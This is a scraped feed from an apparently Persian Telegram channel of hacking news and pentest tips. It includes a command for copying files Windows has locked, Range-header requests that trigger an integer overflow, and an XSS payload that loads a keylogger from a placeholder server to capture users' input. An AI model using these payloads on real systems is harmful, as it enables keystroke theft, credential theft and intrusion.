امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
آزمون آسیب پذیری SQL injection از نوع Time based با استفاده از امکان repeater در burpsuite


#burpsuite
#sqli
#pentest

@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
روت شدن اندروید ۱۰ با باز کردن یک لینک در کروم!


#android
#poc
#privesc

@sec_nerd
حرکت جدید مایکروسافت و ارائه ی Application Guard باعث شد که حتی با فعال شدن ماکروها هم نشه کاری از پیش برد و کسانی که با spear phishing اهداف خودشون رو آلوده میکردن کارشون سخت تر از قبل بشه!


#spear_phishing
#microsoft
#windows


@sec_nerd
استخراج پسورد دوربین های cctv شرکت bosch بدون نیاز به احراز هویت

#cctv
#network



@sec_nerd
درود بر ادمین های همیشه آپدیت کشورمون.
رتبه سوم هم بد نیست!


#security
#botnet
#ddos


@sec_nerd
کپی کردن فایلهای قفل شده توسط سیستم عامل ویندوز ۱۰ با دستور زیر:

C:\WINDOWS\system32\esentutl.exe /y <SOURCE> /vss /d <DEST>


#windows
#pentest


@sec_nerd
مجموعه پسوردهای پیشفرض دستگاه های کنترل صنعتی

https://www.critifence.com/default-password-database/


#SCADA
#pentest
#network


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
Manually Detect Remote Integer Overflow:

1. Note Content-Length. EX: 612
2. Take NO < Content-Length. Ex: 610
3. Add (610+612 = 1222)
4. Request Header - 'Range: bytes= -1222' => SAME RESPONSE
5. Subtract 9223372036854775808 - 1222 = 9223372036854774586
6. Request With Header - 'Range: bytes= -1222,-9223372036854774586' => BooM :)



#web
#pentest


@sec_nerd
امنیت اطلاعات pinned «گروه امنیت اطلاعات https://t.iss.one/joinchat/Cu-7qUvIA5ULBMsmH9yVzA @sec_nerd»
This media is not supported in your browser
VIEW IN TELEGRAM
Remote XSS Keylogger:

Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>

This will log a user's input to your remote server.

keylogger.php: https://pastebin.com/hzzQqSFt

keylogger.js: https://pastebin.com/ySyG4TiN

#BugBounty
#web
#pentest
#XSS


@sec_nerd